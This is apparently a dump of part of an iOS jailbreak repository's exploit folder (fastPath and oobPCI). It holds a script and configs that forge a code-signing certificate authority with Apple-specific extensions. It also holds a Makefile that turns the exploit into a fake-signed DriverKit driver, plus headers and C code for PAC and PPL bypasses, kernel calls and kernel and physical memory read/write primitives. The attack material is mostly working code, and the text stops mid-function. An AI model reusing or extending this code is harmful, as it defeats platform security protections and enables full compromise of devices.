serial 14 | mkdir -p ncerts 15 | rm -f index.txt.* index.txt && touch index.txt 16 | 17 | openssl ca -config ca.conf -extensions v3_intermediate_ca -days 3650 -notext -in itd.csr.pem -out itd.crt -md sha256 -batch 18 | 19 | rm -f index.txt.* index.txt && touch index.txt 20 | 21 | openssl ca -config itd.conf -extensions x86_64_cert -days 3650 -notext -in usr_x86_64.csr.pem -out usr_x86_64.crt -md sha256 -batch 22 | 23 | rm -f index.txt.* index.txt && touch index.txt 24 | 25 | openssl ca -config itd.conf -extensions arm_cert -days 3650 -notext -in usr_arm.csr.pem -out usr_arm.crt -md sha256 -batch 26 | 27 | cat ca.crt itd.crt > cbd.crt 28 | 29 | openssl pkcs12 -export -out x86_64.pfx -inkey usr_x86_64.key -in usr_x86_64.crt -certfile cbd.crt -password pass:password 30 | openssl pkcs12 -export -out arm.pfx -inkey usr_arm.key -in usr_arm.crt -certfile cbd.crt -password pass:password 31 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_arm.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/usr_x86_64.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/itd.key 8 | certificate = $dir/itd.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN Cert 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | -------------------------------------------------------------------------------- /Exploits/fastPath/x86_64.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Exploits/fastPath/x86_64.pfx -------------------------------------------------------------------------------- /Exploits/oobPCI/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /oobPCI 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Makefile: -------------------------------------------------------------------------------- 1 | SDK=macosx 2 | TARGET=arm64-apple-macos12.0 3 | 4 | CC=xcrun -sdk $(SDK) clang 5 | 6 | WARNINGS=-Wall -Wpedantic -Werror 7 | NO_WARNINGS=-Wno-gnu-statement-expression -Wno-gnu-zero-variadic-macro-arguments -Wno-gnu-empty-struct -Wno-dollar-in-identifier-extension -Wno-language-extension-token -Wno-zero-length-array 8 | CFLAGS=-target $(TARGET) -D__arm64__ -D__aarch64__ -D__DARWIN_OPAQUE_ARM_THREAD_STATE64 -nostdlib -O0 $(WARNINGS) $(NO_WARNINGS) 9 | LDFLAGS=-target $(TARGET) -nostdlib -dead-strip -fpie -lSystem 10 | 11 | MIG_SOURCES=$(wildcard Sources/*.defs) 12 | MIG_GENERATED_SOURCES=$(addprefix Sources/generated/,$(patsubst %.defs,%.c,$(notdir $(MIG_SOURCES)))) 13 | MIG_GENERATED_HEADERS=$(addprefix Sources/generated/,$(patsubst %.defs,%.h,$(notdir $(MIG_SOURCES)))) 14 | 15 | SOURCES=$(wildcard Sources/*.c) $(wildcard Sources/*.S) $(MIG_GENERATED_SOURCES) 16 | OBJS=$(addprefix build/,$(patsubst %.c,%.o,$(patsubst %.S,%.o,$(SOURCES)))) 17 | 18 | HEADERS=$(wildcard Sources/*.h) $(MIG_GENERATED_HEADERS) 19 | 20 | OUTPUT_DIRS=$(dir $(OBJS)) 21 | 22 | all: oobPCI 23 | 24 | .PHONY: all build_clean clean 25 | 26 | oobPCI: build/oobPCI 27 | install_name_tool -change /usr/lib/libSystem.B.dylib /System/DriverKit/System/Library/Frameworks/DriverKit.framework/DriverKit $< 28 | ../../Tools/Exe2Driver/Exe2Driver $< $@ 29 | @chmod +x $@ 30 | @ldid -SoobPCI.entitlements $@ 31 | 32 | build/oobPCI: ensure_output_dirs $(MIG_GENERATED_SOURCES) $(MIG_GENERATED_HEADERS) $(OBJS) 33 | $(CC) -o $@ $(OBJS) $(LDFLAGS) 34 | 35 | build/%.o: %.c $(HEADERS) 36 | $(CC) -c -o $@ $< $(CFLAGS) 37 | 38 | build/%.o: %.S $(HEADERS) 39 | $(CC) -c -o $@ $< $(CFLAGS) --std=c++11 40 | 41 | Sources/generated/%.h Sources/generated/%.c: Sources/%.defs 42 | mig -user $(patsubst %.h,%.c,$@) -header $(patsubst %.c,%.h,$@) -server /dev/null -sheader /dev/null $< 43 | 44 | ensure_output_dirs: 45 | mkdir -p $(OUTPUT_DIRS) 46 | 47 | build_clean: 48 | rm -rf build 49 | 50 | clean: build_clean 51 | rm -f oobPCI 52 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/DriverKitClasses.h: -------------------------------------------------------------------------------- 1 | // 2 | // DriverKitClasses.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef DriverKitClasses_h 10 | #define DriverKitClasses_h 11 | 12 | #ifndef DK_DECLARE_CLASS 13 | #define DK_DECLARE_CLASS(name) extern mach_port_t DKCLASS$$$##name; 14 | #endif 15 | 16 | DK_DECLARE_CLASS(IOUserServer) 17 | DK_DECLARE_CLASS(IODispatchQueue) 18 | DK_DECLARE_CLASS(IOBufferMemoryDescriptor) 19 | DK_DECLARE_CLASS(IODMACommand) 20 | 21 | #endif 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/Fugu15KRW.h: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15KRW.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef Fugu15KRW_h 10 | #define Fugu15KRW_h 11 | 12 | #include 13 | 14 | // Yes, Fugu15KRW supports versioning 15 | // No, I don't plan to actually increase the version number 16 | #define FUGU15KRW_VERSION_0 (uint64_t) 0 17 | #define FUGU15KRW_VERSION_CURRENT FUGU15KRW_VERSION_0 18 | 19 | #define FUGU15KRW_ERROR_BAD_SIZE (uint64_t) 1 20 | #define FUGU15KRW_ERROR_BAD_VERSION (uint64_t) 2 21 | #define FUGU15KRW_ERROR_BAD_REQ_ID (uint64_t) 3 22 | 23 | #define FUGU15KRW_REQ_PPL (mach_msg_id_t) 0xF1500 24 | #define FUGU15KRW_REQ_THSIGN (mach_msg_id_t) 0xF1501 25 | #define FUGU15KRW_REQ_OFFSETS (mach_msg_id_t) 0xF1502 26 | 27 | #define FUGU15KRW_REPLY_PPL (mach_msg_id_t) 0x52F1500 28 | #define FUGU15KRW_REPLY_THSIGN (mach_msg_id_t) 0x52F1501 29 | #define FUGU15KRW_REPLY_OFFSETS (mach_msg_id_t) 0x52F1502 30 | 31 | #define FUGU15KRW_REPLY_ERROR (mach_msg_id_t) 0x46457272 32 | 33 | typedef struct { 34 | mach_msg_header_t mach_header; 35 | uint64_t version; // Our version 36 | uint64_t versionMin; // The minimum version the server has to support 37 | } Fugu15KRWRequestCommon; 38 | 39 | typedef struct { 40 | mach_msg_header_t mach_header; 41 | uint64_t version; // Server version 42 | } Fugu15KRWReplyCommon; 43 | 44 | typedef struct { 45 | Fugu15KRWRequestCommon header; 46 | } Fugu15PPLMapRequest; 47 | 48 | typedef struct { 49 | Fugu15KRWReplyCommon header; 50 | uint64_t mapAddr; 51 | } Fugu15PPLMapReply; 52 | 53 | typedef struct { 54 | Fugu15KRWRequestCommon header; 55 | uint64_t signAddr; 56 | } Fugu15ThSignRequest; 57 | 58 | typedef struct { 59 | Fugu15KRWReplyCommon header; 60 | } Fugu15ThSignReply; 61 | 62 | typedef struct { 63 | Fugu15KRWRequestCommon header; 64 | } Fugu15OffsetsRequest; 65 | 66 | typedef struct { 67 | Fugu15KRWReplyCommon header; 68 | uint64_t virtualBase; // As reported in the boot args structure 69 | uint64_t physicalBase; // As reported in the boot args structure 70 | uint64_t vKernelBase; // pKernelBase = vKernelBase - virtualBase + physicalBase 71 | uint64_t kernelSlide; // vKernelBase - default kernel load address 72 | uint64_t kernelTTEP; // Root translation table of the kernel, physical address 73 | } Fugu15OffsetsReply; 74 | 75 | typedef struct { 76 | Fugu15KRWReplyCommon header; 77 | uint64_t errorCode; 78 | } Fugu15ErrorReply; 79 | 80 | #endif /* Fugu15KRW_h */ 81 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/badRecovery.h: -------------------------------------------------------------------------------- 1 | // 2 | // badRecovery.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef badRecovery_h 10 | #define badRecovery_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | typedef struct { 17 | uint64_t unk; 18 | uint64_t x[29]; 19 | uint64_t fp; 20 | uint64_t lr; 21 | uint64_t sp; 22 | uint64_t pc; 23 | uint32_t cpsr; 24 | // Other stuff 25 | uint64_t other[70]; 26 | } kRegisterState; 27 | 28 | typedef struct { 29 | bool inited; 30 | thread_t gExploitThread; 31 | uint64_t gScratchMemKern; 32 | volatile uint64_t *gScratchMemMapped; 33 | arm_thread_state64_t gExploitThreadState; 34 | uint64_t gSpecialMemRegion; 35 | uint64_t gIntStack; 36 | uint64_t gOrigIntStack; 37 | uint64_t gReturnContext; 38 | uint64_t gACTPtr; 39 | uint64_t gACTVal; 40 | uint64_t gCPUData; 41 | } exploitThreadInfo; 42 | 43 | typedef struct { 44 | bool inited; 45 | thread_t thread; 46 | uint64_t actContext; 47 | kRegisterState signedState; 48 | uint64_t kernelStack; 49 | kRegisterState *mappedState; 50 | uint64_t scratchMemory; 51 | uint64_t *scratchMemoryMapped; 52 | } Fugu14KcallThread; 53 | 54 | bool breakCFI(uint64_t kernelBase); 55 | void deinitFugu15PACBypass(void); 56 | 57 | bool setupFugu14Kcall(void); 58 | 59 | void pac_exploit_thread(void); 60 | void pac_exploit_doIt(void); 61 | void pac_loop(void); 62 | 63 | void ppl_loop(void); 64 | void ppl_done(void); 65 | 66 | void kexec(kRegisterState *state, exploitThreadInfo *info); 67 | uint64_t kcall(uint64_t func, uint64_t a1, uint64_t a2, uint64_t a3, uint64_t a4, uint64_t a5, uint64_t a6, uint64_t a7, uint64_t a8); 68 | 69 | bool kexec_on_new_thread(kRegisterState *kState, thread_t *thread); 70 | 71 | #endif /* badRecovery_h */ 72 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/includeme.h: -------------------------------------------------------------------------------- 1 | // 2 | // includeme.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef includeme_h 10 | #define includeme_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | // SpawnDrv/kexploitd helper functions 18 | #define DBG_DK_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4142434400ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 19 | #define DBG_EXPLOIT_FUNC(id) ptrauth_sign_unauthenticated((void*)(0x4841585800ULL + (id * 4ULL)), ptrauth_key_function_pointer, 0) 20 | 21 | #define DBG_DK_FUNC_CHECKIN DBG_DK_FUNC(0) 22 | #define DBG_DK_FUNC_NOTIFY DBG_DK_FUNC(1) 23 | #define DBG_DK_FUNC_GET_PCI_SIZE DBG_DK_FUNC(2) 24 | 25 | #define DBG_GETOFFSETS_FUNC DBG_EXPLOIT_FUNC(0) 26 | #define DBG_KRW_READY_FUNC DBG_EXPLOIT_FUNC(1) 27 | #define DBG_SET_FAULT_HNDLR DBG_EXPLOIT_FUNC(2) 28 | #define DBG_GET_REQUEST DBG_EXPLOIT_FUNC(3) 29 | #define DBG_SEND_REPLY DBG_EXPLOIT_FUNC(4) 30 | // #define DBG_COPYOUT_PORTS DBG_EXPLOIT_FUNC(5) 31 | #define DBG_WRITE_BOOT_INFO_UINT64 DBG_EXPLOIT_FUNC(6) 32 | #define DBG_WRITE_BOOT_INFO_DATA DBG_EXPLOIT_FUNC(7) 33 | 34 | #define DBG_SEND_SYNC_LOG DBG_EXPLOIT_FUNC(8) 35 | 36 | // Debug stuff 37 | #define DBGPRINT_ADDRVAR(var) printf("[DBG] %s: %s @ %p\n", __func__, #var, (void*) var) 38 | #define DBGPRINT_VAR(var) printf("[DBG] %s: %s: %p\n", __func__, #var, (void*) (uint64_t) var) 39 | 40 | // Did I mention that I love Swift? 41 | #define guard(cond) if (__builtin_expect(!!(cond), 1)) {} 42 | 43 | #define MEMORY_BARRIER asm volatile("dmb sy"); 44 | 45 | extern void status_update(const char *status); 46 | 47 | #endif /* includeme_h */ 48 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.c: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #include "kernel.h" 10 | 11 | #include "includeme.h" 12 | #include "offsets.h" 13 | #include "badRecovery.h" 14 | 15 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va) { 16 | uint64_t pmap_enter_options_addr_ptr = SLIDE(gOffsets.pmap_enter_options_addr); 17 | 18 | while (1) { 19 | kern_return_t kr = (kern_return_t) kcall(pmap_enter_options_addr_ptr, pmap, va, pa, VM_PROT_READ | VM_PROT_WRITE, 0, 0, 1, 1); 20 | if (kr != KERN_RESOURCE_SHORTAGE) { 21 | return kr; 22 | } 23 | else { 24 | // On resource shortage, alloc new page 25 | //pmap_alloc_page_for_ppl(); 26 | } 27 | } 28 | } 29 | 30 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end) { 31 | uint64_t pmap_remove_options_ptr = SLIDE(gOffsets.pmap_remove_options); 32 | 33 | kcall(pmap_remove_options_ptr, pmap, start, end, 0x100, 0, 0, 0, 0); 34 | } 35 | 36 | void pmap_set_nested(uint64_t pmap) { 37 | uint64_t pmap_set_nested_ptr = SLIDE(gOffsets.pmap_set_nested); 38 | 39 | kcall(pmap_set_nested_ptr, pmap, 0, 0, 0, 0, 0, 0, 0); 40 | } 41 | 42 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size) { 43 | uint64_t pmap_nest_ptr = SLIDE(gOffsets.pmap_nest); 44 | 45 | return (kern_return_t) kcall(pmap_nest_ptr, grand, subord, vstart, size, 0, 0, 0, 0); 46 | } 47 | 48 | void pmap_mark_page_as_ppl_page(uint64_t page) { 49 | uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_mark_page_as_ppl_page); 50 | 51 | kcall(pmap_mark_page_as_ppl_page_ptr, page, 1, 0, 0, 0, 0, 0, 0); 52 | } 53 | 54 | uint64_t pmap_alloc_page_for_kern(void) 55 | { 56 | uint64_t pmap_mark_page_as_ppl_page_ptr = SLIDE(gOffsets.pmap_alloc_page_for_kern); 57 | return kcall(pmap_mark_page_as_ppl_page_ptr, 0, 0, 0, 0, 0, 0, 0, 0); 58 | } 59 | 60 | void pmap_alloc_page_for_ppl(void) 61 | { 62 | //thread_t self = current_thread(); 63 | 64 | //uint16_t thread_options = self->options; 65 | //self->options |= TH_OPT_VMPRIV; 66 | uint64_t pa = pmap_alloc_page_for_kern(); 67 | //self->options = thread_options; 68 | 69 | if (pa != 0) { 70 | pmap_mark_page_as_ppl_page(pa); 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernel.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernel.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernel_h 10 | #define kernel_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | kern_return_t pmap_enter_options_addr(uint64_t pmap, uint64_t pa, uint64_t va); 17 | void pmap_remove(uint64_t pmap, uint64_t start, uint64_t end); 18 | 19 | void pmap_set_nested(uint64_t pmap); 20 | kern_return_t pmap_nest(uint64_t grand, uint64_t subord, uint64_t vstart, uint64_t size); 21 | 22 | void pmap_mark_page_as_ppl_page(uint64_t page); 23 | uint64_t pmap_alloc_page_for_kern(void); 24 | void pmap_alloc_page_for_ppl(void); 25 | 26 | #endif /* kernel_h */ 27 | 28 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/kernrw_alloc.h: -------------------------------------------------------------------------------- 1 | // 2 | // kernrw_alloc.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef kernrw_alloc_h 10 | #define kernrw_alloc_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool kernread (uint64_t addr, size_t len, void *buffer); 17 | bool kernwrite(uint64_t addr, void *buffer, size_t len); 18 | 19 | uint64_t kmemAlloc(uint64_t size, void **mappedAddr, bool leak); 20 | 21 | #endif /* kernrw_alloc_h */ 22 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/mach_host.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | 33 | import ; /* for host_page_size() */ 34 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/oobPCI.h: -------------------------------------------------------------------------------- 1 | // 2 | // oobPCI.c 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | 10 | #ifndef oobPCI_h 11 | #define oobPCI_h 12 | 13 | #include 14 | #include 15 | #include 16 | 17 | bool oobPCI_init(uint64_t *kBase, uint64_t *virtBase, uint64_t *physBase); 18 | 19 | #endif /* oobPCI_h */ 20 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/physrw.h: -------------------------------------------------------------------------------- 1 | // 2 | // physrw.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef physrw_h 10 | #define physrw_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool buildPhysPrimitive(uint64_t kernelBase); 17 | 18 | // R/W 19 | bool physread(uint64_t addr, size_t len, void *buffer); 20 | bool physwrite(uint64_t addr, void *buffer, size_t len); 21 | 22 | uint64_t rp64(uint64_t addr); 23 | uint32_t rp32(uint64_t addr); 24 | uint16_t rp16(uint64_t addr); 25 | uint8_t rp8(uint64_t addr); 26 | 27 | // Address translation 28 | uint64_t translateAddr_inTTEP(uint64_t ttep, uint64_t virt); 29 | uint64_t translateAddr(uint64_t virt); 30 | 31 | // Internal function 32 | // Can be used once to map arbitrary physical memory 33 | uint64_t physrw_map_once(uint64_t addr); 34 | 35 | #endif /* physrw_h */ 36 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.c: -------------------------------------------------------------------------------- 1 | #include "includeme.h" 2 | #include "generated/task.h" 3 | 4 | int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec); 5 | 6 | semaphore_t clock_sem = 0; 7 | 8 | int nanosleep(int64_t tv_sec, int32_t tv_nsec) 9 | { 10 | if (clock_sem == 0) { 11 | semaphore_create(mach_task_self_, (semaphore_t *)&clock_sem, 0, 0); 12 | } 13 | return __semwait_signal(clock_sem, 0, 1, 1, tv_sec, tv_nsec); 14 | } 15 | 16 | 17 | int usleep(uint64_t useconds) 18 | { 19 | return nanosleep(useconds / 1000000, 1000 * (useconds % 1000000)); 20 | } 21 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/sleep.h: -------------------------------------------------------------------------------- 1 | int nanosleep(int64_t tv_sec, int32_t tv_nsec); 2 | int usleep(uint64_t useconds); 3 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/task.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/thread.defs: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | 29 | #define LIBSYSCALL_INTERFACE 1 30 | 31 | #include 32 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/tlbFail.h: -------------------------------------------------------------------------------- 1 | // 2 | // tlbFail.h 3 | // oobPCI 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2022 Pinauten GmbH. All rights reserved. 7 | // 8 | 9 | #ifndef tlbFail_h 10 | #define tlbFail_h 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | bool pplBypass(void); 17 | 18 | void* getPhysMapWindow(uint64_t phys); 19 | 20 | bool physwrite_PPL(uint64_t addr, void *buffer, size_t len); 21 | bool kernwrite_PPL(uint64_t addr, void *buffer, size_t len); 22 | 23 | uint64_t pmap_lv2(uint64_t pmap, uint64_t virt); 24 | 25 | #endif /* tlbFail_h */ 26 | -------------------------------------------------------------------------------- /Exploits/oobPCI/Sources/virtrw.c: -------------------------------------------------------------------------------- 1 | #include "virtrw.h" 2 | 3 | void kreadbuf(uint64_t kaddr, void* output, size_t size) 4 | { 5 | uint64_t endAddr = kaddr + size; 6 | uint32_t outputOffset = 0; 7 | unsigned char* outputBytes = (unsigned char*)output; 8 | 9 | for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4) 10 | { 11 | uint32_t k = kread32(curAddr); 12 | 13 | unsigned char* kb = (unsigned char*)&k; 14 | for(int i = 0; i < 4; i++) 15 | { 16 | if(outputOffset == size) break; 17 | outputBytes[outputOffset] = kb[i]; 18 | outputOffset++; 19 | } 20 | if(outputOffset == size) break; 21 | } 22 | } 23 | 24 | void kwritebuf(uint64_t kaddr, void* input, size_t size) 25 | { 26 | uint64_t endAddr = kaddr + size; 27 | uint32_t inputOffset = 0; 28 | unsigned char* inputBytes = (unsigned char*)input; 29 | 30 | for(uint64_t curAddr = kaddr; curAddr < endAddr; curAddr += 4) 31 | { 32 | uint32_t toWrite = 0; 33 | int bc = 4; 34 | 35 | uint64_t remainingBytes = endAddr - curAddr; 36 | if(remainingBytes < 4) 37 | { 38 | toWrite = kread32(curAddr); 39 | bc = (int)remainingBytes; 40 | } 41 | 42 | unsigned char* wb = (unsigned char*)&toWrite; 43 | for(int i = 0; i < bc; i++) 44 | { 45 | wb[i] = inputBytes[inputOffset]; 46 | inputOffset++; 47 | } 48 | 49 | 